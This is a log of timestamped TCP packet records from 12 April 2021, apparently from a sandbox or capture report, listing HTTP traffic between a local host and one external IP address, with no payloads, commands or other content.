Apr 12, 2021 07:47:21.574429989 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.574460983 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.574469090 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.574502945 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.574517012 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.574532032 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.574559927 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.574564934 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.574598074 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.574610949 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.574635983 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.574640036 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.574673891 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.574709892 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.574737072 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.574774981 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.574786901 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.574816942 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.574816942 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.574866056 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.575247049 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.575289965 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.575328112 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.575349092 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.575367928 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.575407982 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.575423956 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.575444937 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.575457096 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.575484991 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.575500011 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.575521946 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.575531960 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.575558901 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.575568914 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.575612068 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.575649023 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.575663090 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.575686932 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.575692892 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.575725079 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.575741053 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.575763941 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.575781107 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.575802088 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.575814962 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.575840950 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.575841904 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.577003002 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.577045918 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.585318089 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.811461926 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.811523914 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.811554909 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.811584949 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.811628103 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.811667919 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.811706066 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.811754942 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.811800003 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.811824083 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.811836958 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.811861038 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.811875105 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.811913013 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.811919928 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.811945915 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.811949968 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.811983109 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.811989069 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.812012911 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.812026024 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.812046051 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.812074900 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.812082052 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.812119007 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.812155962 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.812184095 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.812195063 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.812216997 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.812235117 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.812254906 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.812272072 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.812309980 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.812309980 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.812347889 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.812347889 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.812377930 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.812395096 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.812416077 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.812437057 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.812448025 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.812474012 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.812501907 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.812511921 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.812534094 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.812550068 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.812573910 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.812587023 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.812614918 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.812624931 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.812644958 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.812661886 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.812694073 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.812707901 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.812731981 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.812750101 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.812769890 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.812788010 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.812819004 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.812825918 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.812845945 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.812865019 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.812881947 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.812901974 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.812923908 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.812939882 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.812963963 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.812977076 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.813002110 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.813024998 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.813040972 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.813069105 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.813086987 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.813107014 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.813129902 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.813146114 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.813167095 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.813184977 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.813205004 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.813220978 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.813245058 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.813258886 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.813287973 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.813297033 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.813319921 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.813355923 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.814841032 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.819010019 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.820254087 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.827728033 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.046972990 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.047040939 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.047075033 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.047118902 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.047158957 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.047197104 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.047244072 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.047250032 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.047286987 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.047297001 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.047306061 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.047312021 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.047353983 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.048645020 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.048701048 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.048742056 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.048783064 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.048803091 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.048818111 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.048830032 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.048858881 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.048873901 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.048903942 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.048912048 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.048949957 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.048950911 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.048988104 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.048991919 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.049022913 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.049042940 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.049083948 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.049084902 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.049107075 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.049124002 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.049161911 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.049170971 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.049184084 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.049213886 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.049242020 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.049252033 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.049309969 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.049315929 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.049355030 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.049392939 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.049421072 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.049433947 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.049488068 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.049503088 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.049540043 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.049546003 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.049575090 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.049585104 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.049601078 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.049622059 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.049640894 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.049668074 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.049704075 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.049710035 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.049737930 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.049746990 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.049786091 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.049787998 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.049803972 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.049823046 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.049835920 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.049860001 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.049887896 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.049899101 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.049926043 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.049936056 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.049959898 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.049984932 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.049988031 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.050038099 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.050071001 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.050075054 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.050121069 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.050123930 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.050160885 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.050162077 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.050189972 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.050199986 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.050215960 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.050239086 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.050254107 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.050277948 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.050314903 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.050353050 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.050374985 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.055316925 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.057858944 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.061691046 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.064245939 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.281610966 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.281696081 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.281739950 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.281779051 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.281816006 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.281862974 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.281904936 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.281944036 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.281981945 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.282001019 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.282020092 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.282058001 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.282078028 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.282084942 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.282100916 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.282113075 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.282120943 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.282125950 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.282130957 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.282135010 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.282138109 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.282186031 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.282200098 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.282207012 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.282227993 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.282253981 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.282264948 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.282284021 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.282315969 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.284414053 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.284470081 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.284518003 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.284560919 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.284600973 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.284641981 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.284682035 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.284737110 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.284799099 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.284796953 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.284827948 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.284832954 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.284837008 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.284841061 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.284852982 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.284903049 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.284917116 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.284919024 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.284962893 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.284993887 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.285012007 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.285015106 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.285068035 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.285087109 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.285119057 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.285161972 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.285187960 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.285200119 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.285213947 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.285250902 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.285254955 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.285309076 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.285310984 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.285330057 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.285367012 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.285367966 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.285439014 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.285450935 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.285506964 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.285521984 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.285554886 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.285572052 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.285602093 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.285617113 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.285648108 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.285662889 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.285695076 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.285716057 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.285746098 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.285746098 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.285798073 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.285857916 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.285914898 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.285934925 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.285943985 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.285948992 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.285959959 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.285988092 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.286010981 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.286015034 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.286051035 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.286077023 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.286097050 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.286108971 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.286149025 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.286197901 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.286216974 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.286247015 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.286267042 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.286298990 CEST	80	49168	103.141.138.118	192.168.2.22
